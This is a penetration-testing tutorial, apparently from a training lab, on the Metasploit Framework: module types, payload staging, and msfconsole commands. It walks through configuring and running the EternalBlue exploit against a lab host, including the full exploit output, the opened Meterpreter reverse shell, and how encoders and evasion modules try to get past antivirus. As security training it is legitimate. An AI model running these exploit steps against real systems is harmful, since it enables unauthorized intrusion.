Metasploit

Metasploit is the most widely used exploitation framework. Metasploit is a powerful tool that can support all phases of a penetration testing engagement, from information gathering to post-exploitation.

Metasploit has two main versions:

  • Metasploit Pro: The commercial version that facilitates the automation and management of tasks. This version has a graphical user interface (GUI).
  • Metasploit Framework: The open-source version that works from the command line. This room will focus on this version, installed on the AttackBox and most commonly used penetration testing Linux distributions.

The Metasploit Framework is a set of tools that allow information gathering, scanning, exploitation, exploit development, post-exploitation, and more. While the primary usage of the Metasploit Framework focuses on the penetration testing domain, it is also useful for vulnerability research and exploit development.

The main components of the Metasploit Framework can be summarized as follows:

  • msfconsole: The main command-line interface.
  • Modules: supporting modules such as exploits, scanners, payloads, etc.
  • Tools: Stand-alone tools that will help vulnerability research, vulnerability assessment, or penetration testing. Some of these tools are msfvenom, pattern_create and pattern_offset.

Main components

While using the Metasploit Framework, you will primarily interact with the Metasploit console. You can launch it from the terminal using the msfconsole command. The console will be your main interface to interact with the different modules of the Metasploit Framework. Modules are small components within the Metasploit framework that are built to perform a specific task, such as exploiting a vulnerability, scanning a target, or performing a brute-force attack.

Before diving into modules, it would be helpful to clarify a few recurring concepts: vulnerability, exploit, and payload.

  • Exploit: A piece of code that uses a vulnerability present on the target system.
  • Vulnerability: A design, coding, or logic flaw affecting the target system. The exploitation of a vulnerability can result in disclosing confidential information or allowing the attacker to execute code on the target system.
  • Payload: An exploit will take advantage of a vulnerability. However, if we want the exploit to have the result we want (gaining access to the target system, reading confidential information, etc.), we need to use a payload. Payloads are the code that will run on the target system.

Auxiliary: Any supporting module, such as scanners, crawlers and fuzzers, can be found here.

Encoders: Encoders will allow you to encode the exploit and payload in the hope that a signature-based antivirus solution may miss them.

Signature-based antivirus and security solutions have a database of known threats. They detect threats by comparing suspicious files to this database and raise an alert if there is a match. Thus, encoders can have a limited success rate, as antivirus solutions can perform additional checks.

Evasion: While encoders will encode the payload, they should not be considered a direct attempt to evade antivirus software.

On the other hand, “evasion” modules will try that, with more or less success.

Exploits: Exploits, neatly organized by target system.

NOPs: NOPs (No OPeration) do nothing, literally.

In the Intel x86 CPU family they are represented by the byte 0x90, on which the CPU does nothing for one cycle. They are often used as a buffer to achieve consistent payload sizes.

Payloads: Payloads are codes that will run on the target system.

Exploits will leverage a vulnerability on the target system, but to achieve the desired result, we will need a payload. Examples could be: getting a shell, loading a malware or backdoor to the target system, running a command, or launching calc.exe as a proof of concept to add to the penetration test report. Starting the calculator on the target system remotely by launching the calc.exe application is a benign way to show that we can run commands on the target system.

Running a command on the target system is already an important step, but having an interactive connection that allows you to type commands that will be executed on the target system is better. Such an interactive command line is called a "shell". Metasploit offers the ability to send different payloads that can open shells on the target system.

You will see three different directories under payloads: singles, stagers and stages.

  • Singles: Self-contained payloads (add user, launch notepad.exe, etc.) that do not need to download an additional component to run.
  • Stagers: Responsible for setting up a connection channel between Metasploit and the target system. Useful when working with staged payloads. “Staged payloads” will first upload a stager on the target system then download the rest of the payload (stage). This provides some advantages as the initial size of the payload will be relatively small compared to the full payload sent at once.
  • Stages: Downloaded by the stager. This will allow you to use larger sized payloads.

Metasploit has a subtle way to help you identify single (also called “inline”) payloads and staged payloads.

generic/shell_reverse_tcp
windows/x64/shell/reverse_tcp

Both are reverse Windows shells. The former is an inline (or single) payload, as indicated by the “_” between “shell” and “reverse”, while the latter is a staged payload, as indicated by the “/” between “shell” and “reverse”.
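The naming rule above can be applied mechanically. The Ruby below is an added example written for this page, not code from Metasploit itself: it classifies a payload name as inline or staged from the separator in front of the stager, and runs that rule over the rows of a "show payloads" listing. The list of stage names is an assumption (the two stages named on this page plus two other well-known Windows stages); a name with no recognised stage keyword is reported as unknown rather than guessed.

```ruby
# Added example, not Metasploit's own code. Stage names the "_" vs "/" rule is
# applied to; an assumption of this example, extend as needed.
STAGE_NAMES = %w[shell meterpreter vncinject dllinject].freeze

# Returns :single (inline), :staged, or :unknown when no recognised stage
# keyword appears and the naming rule therefore cannot be applied.
def payload_kind(name)
  parts = name.sub(%r{\Apayload/}, '').split('/')
  last = parts[-1]
  stage = parts[-2]
  if stage && STAGE_NAMES.include?(stage)
    :staged   # stage and stager are separate components: "shell/reverse_tcp"
  elsif STAGE_NAMES.any? { |s| last.start_with?("#{s}_") }
    :single   # stage and stager fused with "_": "shell_reverse_tcp"
  else
    :unknown
  end
end

# Apply the rule to a "show payloads" listing: each data row starts with an
# index followed by the payload name. Returns { name => kind }.
def classify_listing(listing)
  listing.each_line.with_object({}) do |line, out|
    next unless (m = line.match(/\A\s*\d+\s+(\S+)/))
    out[m[1]] = payload_kind(m[1])
  end
end

# Constructed sample: a subset of the rows from the "show payloads" output above.
SAMPLE_LISTING = <<~LIST
  #   Name                                        Disclosure Date  Rank    Check  Description
  -   ----                                        ---------------  ----    -----  -----------
  0   generic/custom                                               manual  No     Custom Payload
  1   generic/shell_bind_tcp                                       manual  No     Generic Command Shell, Bind TCP Inline
  2   generic/shell_reverse_tcp                                    manual  No     Generic Command Shell, Reverse TCP Inline
  3   windows/x64/exec                                             manual  No     Windows x64 Execute Command
  6   windows/x64/meterpreter/bind_ipv6_tcp                        manual  No     Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
LIST

if $PROGRAM_NAME == __FILE__
  classify_listing(SAMPLE_LISTING).each { |name, kind| puts format('%-45s %s', name, kind) }
end
```

Run it on its own and it prints one line per payload with the classification; generic/custom and windows/x64/exec come out as unknown because they carry no stage keyword, which is exactly the case where the separator rule says nothing.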

Post: Post modules will be useful on the final stage of the penetration testing process listed above, post-exploitation.

If you wish to familiarize yourself further with these modules, you can find them under the modules folder of your Metasploit installation.

Msfconsole

Msfconsole is managed by context; this means that unless set as a global variable, all parameter settings will be lost if you change the module you have decided to use. In the example below, we have used the ms17_010_eternalblue exploit, and we have set parameters such as RHOSTS. If we were to switch to another module (e.g. a port scanner), we would need to set the RHOSTS value again as all changes we have made remained in the context of the ms17_010_eternalblue exploit.

Let us look at the example below to have a better understanding of this feature. We will use the MS17-010 “Eternalblue” exploit for illustration purposes.

Once you type the use exploit/windows/smb/ms17_010_eternalblue command, you will see the command line prompt change from msf6 to “msf6 exploit(windows/smb/ms17_010_eternalblue)”. "EternalBlue" is an exploit allegedly developed by the U.S. National Security Agency (N.S.A.) for a vulnerability affecting the SMBv1 server on numerous Windows systems. SMB (Server Message Block) is widely used in Windows networks for file sharing and even for sending files to printers. EternalBlue was leaked by the cybercriminal group "Shadow Brokers" in April 2017. In May 2017, this vulnerability was exploited worldwide in the WannaCry ransomware attack.

msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) >

The module to be used can also be selected with the use command followed by the number at the beginning of the search result line.

The prompt tells us we now have a context set in which we will work. You can see this by typing the show options command.

msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.220.191    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf6 exploit(windows/smb/ms17_010_eternalblue) >

This will print options related to the exploit we have chosen earlier. The show options command will have different outputs depending on the context it is used in. The example above shows that this exploit requires us to set variables like RHOSTS and RPORT. On the other hand, a post-exploitation module may only need us to set a SESSION ID (see the example below). A session is an existing connection to the target system that the post-exploitation module will use.

msf6 post(windows/gather/enum_domain_users) > show options

Module options (post/windows/gather/enum_domain_users):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HOST                      no        Target a specific host
   SESSION                   yes       The session to run this module on.
   USER                      no        Target User for NetSessionEnum

msf6 post(windows/gather/enum_domain_users) >

The show command can be used in any context followed by a module type (auxiliary, payload, exploit, etc.) to list available modules. The example below lists payloads that can be used with the ms17-010 Eternalblue exploit.

msf6 exploit(windows/smb/ms17_010_eternalblue) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   generic/custom                                               manual  No     Custom Payload
   1   generic/shell_bind_tcp                                       manual  No     Generic Command Shell, Bind TCP Inline
   2   generic/shell_reverse_tcp                                    manual  No     Generic Command Shell, Reverse TCP Inline
   3   windows/x64/exec                                             manual  No     Windows x64 Execute Command
   4   windows/x64/loadlibrary                                      manual  No     Windows x64 LoadLibrary Path
   5   windows/x64/messagebox                                       manual  No     Windows MessageBox x64
   6   windows/x64/meterpreter/bind_ipv6_tcp                        manual  No     Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
   7   windows/x64/meterpreter/bind_ipv6_tcp_uuid                   manual  No     Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support 

If used from the msfconsole prompt, the show command will list all modules.

The use and show options commands we have seen so far are identical for all modules in Metasploit.

You can leave the context using the back command.

msf6 exploit(windows/smb/ms17_010_eternalblue) > back
msf6 > 

Further information on any module can be obtained by typing the info command within its context.

msf6 exploit(windows/smb/ms17_010_eternalblue) > info

       Name: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
     Module: exploit/windows/smb/ms17_010_eternalblue
   Platform: Windows
       Arch: 
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Average
  Disclosed: 2017-03-14

Provided by:
  Sean Dillon 
  Dylan Davis 
  Equation Group
  Shadow Brokers
  thelightcosine

Available targets:
  Id  Name
  --  ----
  0   Windows 7 and Server 2008 R2 (x64) All Service Packs

Check supported:
  Yes

Basic options:
  Name           Current Setting  Required  Description
  ----           ---------------  --------  -----------
  RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
  RPORT          445              yes       The target port (TCP)
  SMBDomain      .                no        (Optional) The Windows domain to use for authentication
  SMBPass                         no        (Optional) The password for the specified username
  SMBUser                         no        (Optional) The username to authenticate as
  VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
  VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.

Payload information:
  Space: 2000

Description:
  This module is a port of the Equation Group ETERNALBLUE exploit, 
  part of the FuzzBunch toolkit released by Shadow Brokers. There is a 
  buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is 
  calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error 
  where a DWORD is subtracted into a WORD. The kernel pool is groomed 
  so that overflow is well laid-out to overwrite an SMBv1 buffer. 
  Actual RIP hijack is later completed in 
  srvnet!SrvNetWskReceiveComplete. This exploit, like the original may 
  not trigger 100% of the time, and should be run continuously until 
  triggered. It seems like the pool will get hot streaks and need a 
  cool down period before the shells rain in again. The module will 
  attempt to use Anonymous login, by default, to authenticate to 
  perform the exploit. If the user supplies credentials in the 
  SMBUser, SMBPass, and SMBDomain options it will use those instead. 
  On some systems, this module may cause system instability and 
  crashes, such as a BSOD or a reboot. This may be more likely with 
  some payloads.

References:
  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/MS17-010
  https://cvedetails.com/cve/CVE-2017-0143/
  https://cvedetails.com/cve/CVE-2017-0144/
  https://cvedetails.com/cve/CVE-2017-0145/
  https://cvedetails.com/cve/CVE-2017-0146/
  https://cvedetails.com/cve/CVE-2017-0147/
  https://cvedetails.com/cve/CVE-2017-0148/
  https://github.com/RiskSense-Ops/MS17-010

Also known as:
  ETERNALBLUE

msf6 exploit(windows/smb/ms17_010_eternalblue) > 

Alternatively, you can use the info command followed by the module’s path from the msfconsole prompt (e.g. info exploit/windows/smb/ms17_010_eternalblue). Info is not a help menu; it will display detailed information on the module such as its author, relevant sources, etc.

One of the most useful commands in msfconsole is search. This command will search the Metasploit Framework database for modules relevant to the given search parameter. You can conduct searches using CVE numbers, exploit names (eternalblue, heartbleed, etc.), or target system.

msf6 > search ms17-010

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index, for example use 4 or use exploit/windows/smb/smb_doublepulsar_rce

msf6 >

The output of the search command provides an overview of each returned module. You may notice the “name” column already gives more information than just the module name. You can see the type of module (auxiliary, exploit, etc.) and the category of the module (scanner, admin, windows, Unix, etc.). You can use any module returned in a search result with the command use followed by the number at the beginning of the result line. (e.g. use 0 instead of use auxiliary/admin/smb/ms17_010_command)

Another essential piece of information returned is in the “rank” column. Exploits are rated based on their reliability. The table below provides their respective descriptions.

[Image: table of Metasploit exploit rankings and their descriptions]

Source: https://github.com/rapid7/metasploit-framework/wiki/Exploit-Ranking

You can direct the search function using keywords such as type and platform.

For example, if we wanted our search results to only include auxiliary modules, we could set the type to auxiliary. The screenshot below shows the output of the search type:auxiliary telnet command.

msf6 > search type:auxiliary telnet

Matching Modules
================

   #   Name                                                Disclosure Date  Rank    Check  Description
   -   ----                                                ---------------  ----    -----  -----------
   0   auxiliary/admin/http/dlink_dir_300_600_exec_noauth  2013-02-04       normal  No     D-Link DIR-600 / DIR-300 Unauthenticated Remote Command Execution
   1   auxiliary/admin/http/netgear_r6700_pass_reset       2020-06-15       normal  Yes    Netgear R6700v3 Unauthenticated LAN Admin Password Reset
   2   auxiliary/dos/cisco/ios_telnet_rocem                2017-03-17       normal  No     Cisco IOS Telnet Denial of Service
   3   auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof        2010-12-21       normal  No     Microsoft IIS FTP Server Encoded Response Overflow Trigger
   4   auxiliary/scanner/ssh/juniper_backdoor              2015-12-20       normal  No     Juniper SSH Backdoor Scanner
   5   auxiliary/scanner/telnet/brocade_enable_login                        normal  No     Brocade Enable Login Check Scanner
   6   auxiliary/scanner/telnet/lantronix_telnet_password                   normal  No     Lantronix Telnet Password Recovery
   7   auxiliary/scanner/telnet/lantronix_telnet_version                    normal  No     Lantronix Telnet Service Banner Detection
   8   auxiliary/scanner/telnet/satel_cmd_exec             2017-04-07       normal  No     Satel Iberia SenNet Data Logger and Electricity Meters Command Injection Vulnerability
   9   auxiliary/scanner/telnet/telnet_encrypt_overflow                     normal  No     Telnet Service Encryption Key ID Overflow Detection
   10  auxiliary/scanner/telnet/telnet_login                                normal  No     Telnet Login Check Scanner
   11  auxiliary/scanner/telnet/telnet_ruggedcom                            normal  No     RuggedCom Telnet Password Generator
   12  auxiliary/scanner/telnet/telnet_version                              normal  No     Telnet Service Banner Detection
   13  auxiliary/server/capture/telnet                                      normal  No     Authentication Capture: Telnet


Interact with a module by name or index, for example use 13 or use auxiliary/server/capture/telnet

msf6 >

As mentioned earlier, the show options command will list all available parameters. The show options command

msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

  Name           Current Setting  Required  Description
  ----           ---------------  --------  -----------
  RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
  RPORT          445              yes       The target port (TCP)
  SMBDomain      .                no        (Optional) The Windows domain to use for authentication
  SMBPass                         no        (Optional) The password for the specified username
  SMBUser                         no        (Optional) The username to authenticate as
  VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
  VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
  LHOST     10.10.44.70      yes       The listen address (an interface may be specified)
  LPORT     4444             yes       The listen port


Exploit target:

  Id  Name
  --  ----
  0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf5 exploit(windows/smb/ms17_010_eternalblue) >

As you can see in the screenshot above, some of these parameters require a value for the exploit to work. Some required parameter values will be pre-populated; make sure you check whether these should remain the same for your target. For example, a web exploit could have an RPORT (remote port: the port on the target system Metasploit will try to connect to and run the exploit) value preset to 80, but your target web application could be using port 8080.

In this example, we will set the RHOSTS parameter to the IP address of our target system using the set command.

msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.10.165.39
rhosts => 10.10.165.39
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         10.10.165.39     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.44.70      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf5 exploit(windows/smb/ms17_010_eternalblue) >

Once you have set a parameter, you can use the show options command to check the value was set correctly.
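Checking the show options output by eye works for one module, but the same check can be done on the text itself. The Ruby below is an added example written for this page (not Metasploit's own code): it parses the Name / Current Setting / Required / Description tables that show options prints, taking the column boundaries from the dash ruler under each header, and reports every required option that still has no value. It assumes the table layout shown on this page; the sample text is constructed from the output above.

```ruby
# Added example, not Metasploit's own code. Parses "show options" tables as
# printed on this page and flags required options that are still empty.

# Parse every "Name / Current Setting / Required / Description" table in TEXT
# into an array of hashes. Column boundaries come from the dash ruler under
# the header, so values containing spaces are sliced correctly.
def parse_options_tables(text)
  lines = text.lines.map(&:rstrip)
  rows = []
  i = 0
  while i < lines.size
    unless lines[i] =~ /\A\s*Name\s+Current Setting\s+Required\s+Description\s*\z/
      i += 1
      next
    end
    ruler = lines[i + 1].to_s
    # A column starts wherever a run of dashes begins in the ruler line.
    starts = []
    ruler.each_char.with_index { |c, x| starts << x if c == '-' && (x.zero? || ruler[x - 1] != '-') }
    i += 2
    while i < lines.size && !lines[i].strip.empty?
      row = lines[i]
      cells = starts.each_index.map do |k|
        stop = k + 1 < starts.size ? starts[k + 1] : row.size
        (row[starts[k]...stop] || '').strip
      end
      rows << { name: cells[0], value: cells[1], required: cells[2] == 'yes', description: cells[3] }
      i += 1
    end
  end
  rows
end

# Names of required options whose Current Setting is empty.
def missing_required(text)
  parse_options_tables(text).select { |o| o[:required] && o[:value].empty? }.map { |o| o[:name] }
end

# Constructed sample: a subset of the exploit's "show options" output above, RHOSTS unset.
SAMPLE_EXPLOIT = <<~OPTS
  Module options (exploit/windows/smb/ms17_010_eternalblue):

     Name           Current Setting  Required  Description
     ----           ---------------  --------  -----------
     RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
     RPORT          445              yes       The target port (TCP)
     SMBDomain      .                no        (Optional) The Windows domain to use for authentication
     SMBUser                         no        (Optional) The username to authenticate as
     VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.

  Payload options (windows/x64/meterpreter/reverse_tcp):

     Name      Current Setting  Required  Description
     ----      ---------------  --------  -----------
     EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
     LHOST     10.10.44.70      yes       The listen address (an interface may be specified)
     LPORT     4444             yes       The listen port
OPTS

# Constructed sample: the post module's "show options" output above, SESSION unset.
SAMPLE_POST = <<~OPTS
  Module options (post/windows/gather/enum_domain_users):

     Name     Current Setting  Required  Description
     ----     ---------------  --------  -----------
     HOST                      no        Target a specific host
     SESSION                   yes       The session to run this module on.
     USER                      no        Target User for NetSessionEnum
OPTS

if $PROGRAM_NAME == __FILE__
  puts "exploit: required but unset -> #{missing_required(SAMPLE_EXPLOIT).join(', ')}"
  puts "post:    required but unset -> #{missing_required(SAMPLE_POST).join(', ')}"
end
```

For the exploit sample the only gap is RHOSTS, for the post module it is SESSION; pre-populated values such as RPORT 445 pass the check, which is why the text above still tells you to confirm they are right for your target.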

Parameters you will often use are:

  • RHOSTS: “Remote host”, the IP address of the target system. A single IP address or a network range can be set. This will support the CIDR (Classless Inter-Domain Routing) notation (/24, /16, etc.) or a network range (10.10.10.x – 10.10.10.y). You can also use a file where targets are listed, one target per line using file:/path/of/the/target_file.txt, as you can see below.
  • RPORT: “Remote port”, the port on the target system the vulnerable application is running on.
  • PAYLOAD: The payload you will use with the exploit.
  • LHOST: “Localhost”, the attacking machine IP address.
  • LPORT: “Local port”, the port you will use for the reverse shell to connect back to. This is a port on your attacking machine, and you can set it to any port not used by any other application.
  • SESSION: Each connection established to the target system using Metasploit will have a session ID. You will use this with post-exploitation modules that will connect to the target system using an existing connection.

You can override any set parameter using the set command again with a different value. You can also clear any parameter value using the unset command or clear all set parameters with the unset all command.

msf5 exploit(windows/smb/ms17_010_eternalblue) > unset all
Flushing datastore...
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf5 exploit(windows/smb/ms17_010_eternalblue) >

You can use the setg command to set values that will be used for all modules. The setg command is used like the set command. The difference is that if you use the set command to set a value using a module and you switch to another module, you will need to set the value again. The setg command allows you to set the value so it can be used by default across different modules. You can clear any value set with setg using unsetg.

The example below uses the following flow:

  1. We use the ms17_010_eternalblue exploit
  2. We set the RHOSTS variable using the setg command instead of the set command
  3. We use the back command to leave the exploit context
  4. We use an auxiliary module (this module is a scanner to discover MS17-010 vulnerabilities)
  5. The show options command shows the RHOSTS parameter is already populated with the IP address of the target system.

msf5 > use exploit/windows/smb/ms17_010_eternalblue 
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > setg rhosts 10.10.165.39
rhosts => 10.10.165.39
msf5 exploit(windows/smb/ms17_010_eternalblue) > back
msf5 > use auxiliary/scanner/smb/smb_ms17_010 
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                Required  Description
   ----         ---------------                                                --------  -----------
   CHECK_ARCH   true                                                           no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                           no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                          no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /opt/metasploit-framework-5101/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS       10.10.165.39                                                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT        445                                                            yes       The SMB service port (TCP)
   SMBDomain    .                                                              no        The Windows domain to use for authentication
   SMBPass                                                                     no        The password for the specified username
   SMBUser                                                                     no        The username to authenticate as
   THREADS      1                                                              yes       The number of concurrent threads (max one per host)

msf5 auxiliary(scanner/smb/smb_ms17_010) >

The setg command sets a global value that will be used until you exit Metasploit or clear it using the unsetg command.
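The difference between set and setg comes down to two datastores. The Ruby below is a toy model added for this page, not Metasploit's own code: set writes to the active module's own datastore, setg to a global one, unset all flushes only the active module's datastore, and a module reads its own entry first and falls back to the global entry (that lookup order is this model's assumption). The replay function repeats the five-step flow above with either command so the two outcomes can be compared.

```ruby
# Added example, not Metasploit's own code: a toy model of the context-managed
# datastore described above.
class ToyConsole
  attr_reader :current

  def initialize
    @global = {}
    @local = Hash.new { |h, k| h[k] = {} }  # one datastore per module path
    @current = nil
  end

  def use(mod)
    @current = mod
  end

  def back
    @current = nil
  end

  # "set": value lives in the active module's datastore only.
  def set(key, value)
    raise 'no module in use' unless @current
    @local[@current][key.upcase] = value
  end

  # "setg": value lives in the global datastore, seen by every module.
  def setg(key, value)
    @global[key.upcase] = value
  end

  def unset(key)
    @local[@current].delete(key.upcase) if @current
  end

  # "unset all": flushes the active module's datastore, not the global one.
  def unset_all
    @local[@current].clear if @current
  end

  def unsetg(key)
    @global.delete(key.upcase)
  end

  # Effective value as the active module sees it: local first, then global
  # (lookup order assumed by this model).
  def get(key)
    k = key.upcase
    @local.fetch(@current, {}).fetch(k) { @global[k] }
  end
end

# Replay the flow above: set RHOSTS in the exploit context, switch to the
# scanner, and return what the scanner sees. Address taken from the page's example.
def replay(use_setg)
  c = ToyConsole.new
  c.use('exploit/windows/smb/ms17_010_eternalblue')
  use_setg ? c.setg('rhosts', '10.10.165.39') : c.set('rhosts', '10.10.165.39')
  c.back
  c.use('auxiliary/scanner/smb/smb_ms17_010')
  c.get('rhosts')
end

if $PROGRAM_NAME == __FILE__
  puts "with set:  #{replay(false).inspect}"   # nil: lost with the context
  puts "with setg: #{replay(true).inspect}"    # "10.10.165.39": survives the switch
end
```

The model also shows the precedence question the text leaves implicit: a value set in the module shadows a global one for that module only, and unset all brings the global value back into view, while unsetg removes it for every module.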

Using modules

Once all module parameters are set, you can launch the module using the exploit command. Metasploit also supports the run command, which is an alias created for the exploit command as the word exploit did not make sense when using modules that were not exploits (port scanners, vulnerability scanners, etc.).

The exploit command can be used without any parameters or using the -z parameter.

The exploit -z command will run the exploit and background the session as soon as it opens.

msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit -z

[*] Started reverse TCP handler on 10.10.44.70:4444 
[*] 10.10.12.229:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.12.229:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.12.229:445      - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.12.229:445 - Connecting to target for exploitation.
[+] 10.10.12.229:445 - Connection established for exploitation.
[+] 10.10.12.229:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.12.229:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.12.229:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.12.229:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.12.229:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.12.229:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.12.229:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.12.229:445 - Sending all but last fragment of exploit packet
[*] 10.10.12.229:445 - Starting non-paged pool grooming
[+] 10.10.12.229:445 - Sending SMBv2 buffers
[+] 10.10.12.229:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.12.229:445 - Sending final SMBv2 buffers.
[*] 10.10.12.229:445 - Sending last fragment of exploit packet!
[*] 10.10.12.229:445 - Receiving response from exploit packet
[+] 10.10.12.229:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.12.229:445 - Sending egg to corrupted connection.
[*] 10.10.12.229:445 - Triggering free of corrupted buffer.
[*] Sending stage (201283 bytes) to 10.10.12.229
[*] Meterpreter session 2 opened (10.10.44.70:4444 -> 10.10.12.229:49186) at 2021-08-20 02:06:48 +0100
[+] 10.10.12.229:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.12.229:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.12.229:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Session 2 created in the background.
msf5 exploit(windows/smb/ms17_010_eternalblue) >

This will return you to the context prompt from which you ran the exploit.

Some modules support the check option. This will check if the target system is vulnerable without exploiting it.

Sessions

Once a vulnerability has been successfully exploited, a session will be created. This is the communication channel established between the target system and Metasploit.

You can use the background command to send the session to the background and return to the msfconsole prompt.

meterpreter > background
[*] Backgrounding session 2...
